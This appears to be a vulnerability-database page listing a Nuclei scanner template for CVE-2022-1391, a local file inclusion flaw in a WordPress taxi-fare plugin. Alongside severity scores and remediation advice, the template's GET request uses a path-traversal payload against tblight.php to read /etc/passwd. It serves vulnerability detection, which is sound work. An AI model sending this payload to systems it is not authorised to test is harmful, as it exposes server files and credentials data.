Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-1391
HistoryMar 30, 2022 - 5:35 a.m.

WordPress Cab fare calculator < 1.0.4 - Local File Inclusion

2022-03-3005:35:04
ProjectDiscovery
github.com

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.5 High

AI Score

Confidence

High

0.03 Low

EPSS

Percentile

91.0%

The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.
id: CVE-2022-1391

info:
  name: WordPress Cab fare calculator < 1.0.4 - Local File Inclusion
  author: Splint3r7
  severity: critical
  description: |
    The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially exposing sensitive information.
  remediation: |
    Update to the latest version of the WordPress Cab fare calculator plugin (1.0.4) to fix the local file inclusion vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/50843
    - https://wordpress.org/plugins/cab-fare-calculator
    - https://wpscan.com/vulnerability/680121fe-6668-4c1a-a30d-e70dd9be5aac
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1391
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1391
    cwe-id: CWE-22
    epss-score: 0.03037
    epss-percentile: 0.90957
    cpe: cpe:2.3:a:kanev:cab_fare_calculator:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: kanev
    product: cab_fare_calculator
    framework: wordpress
  tags: cve,cve2022,wordpress,wp-plugin,lfi,wp,edb,wpscan,kanev

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a00463044022009ae47ca18eb0f740b5fbaf6d52f2a86f93f7a2a41f2fbec96225469bee7e3bc022027be7eaecdd0f70ea4af238b0f8f200f635f85af42c3a09488a3f00d748b37ce:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.5 High

AI Score

Confidence

High

0.03 Low

EPSS

Percentile

91.0%

Related for NUCLEI:CVE-2022-1391